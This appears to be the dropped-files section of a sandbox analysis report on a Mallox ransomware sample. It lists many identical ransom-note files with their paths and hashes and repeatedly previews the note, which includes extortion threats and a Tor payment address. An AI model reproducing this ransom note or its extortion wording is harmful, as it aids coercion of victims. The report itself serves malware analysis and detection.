                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
